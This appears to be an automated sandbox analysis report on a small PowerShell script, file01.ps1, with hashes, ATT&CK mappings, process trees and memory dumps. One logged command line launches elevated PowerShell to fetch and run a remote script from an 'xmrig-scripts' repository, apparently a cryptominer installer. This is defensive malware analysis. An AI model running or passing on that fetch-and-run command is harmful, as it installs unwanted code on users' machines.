58778391d7e78f26ead35877ea9d65b960f7b846db2f2e814e1f1b2e8f47ecbd

Resubmissions

29/06/2024, 17:27

240629-v1l2zsvfkj 8

29/06/2024, 17:25

240629-vzearaveqr 3

Analysis

max time kernel
46s
max time network
17s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
29/06/2024, 17:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file01.ps1
Size

106B
MD5

79f8239b5db8e5fa66798224a02cc687
SHA1

6eddc1b53c5da52883bce104e34bcb353ca1eb82
SHA256

58778391d7e78f26ead35877ea9d65b960f7b846db2f2e814e1f1b2e8f47ecbd
SHA512

c932b046702cba6db8c57e52b480c7adc9d35876647655a6518844d0010007e524c6c205e1b886d74f1888d9727043f515804eee3f154989c02b17d6ec3bd764

Score

3^/10

defense_evasion execution privilege_escalation

Malware Config

Signatures

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2124	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2820	powershell.exe
2936	powershell.exe

Opens file in notepad (likely ransom note) 3 IoCs

ransomware

pid	Process
2912	notepad.exe
2044	notepad.exe
1972	notepad.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2820	powershell.exe
2124	powershell.exe
2936	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2820 wrote to memory of 2124	2820	powershell.exe	29
PID 2820 wrote to memory of 2124	2820	powershell.exe	29
PID 2820 wrote to memory of 2124	2820	powershell.exe	29

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file01.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1
  2⤵
  - Access Token Manipulation: Create Process with Token
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2124

C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
1⤵
PID:2544

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\file01.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:2912

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\file01.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:2044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\AppData\Local\Temp\file01.ps1"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\file01.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:1972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
535f7f23d50a3d1d032c35860cf3f28d

SHA1
979b56eb0206cbd25bfc7a2dbbd54b7a13481e22

SHA256
26fee36ae063a1efb31c4d50de661ae6d98ee06be41c93d450cd19e1a66f2d1e

SHA512
729749b46de0f3f56939d6fd1d7d1bfa7e4c1cd6c9da81d4fe4310cea99c4136b32aef9c84722e39c9234ad03aab60e1893a21f4c91b1e2620b5c7d923fe8578

Download Submit
memory/2124-14-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-17-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2820-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

Filesize
4KB

Download
memory/2820-5-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

Filesize
2.9MB

Download
memory/2820-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2820-13-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2820-12-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2820-15-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2820-16-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2936-23-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2936-24-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download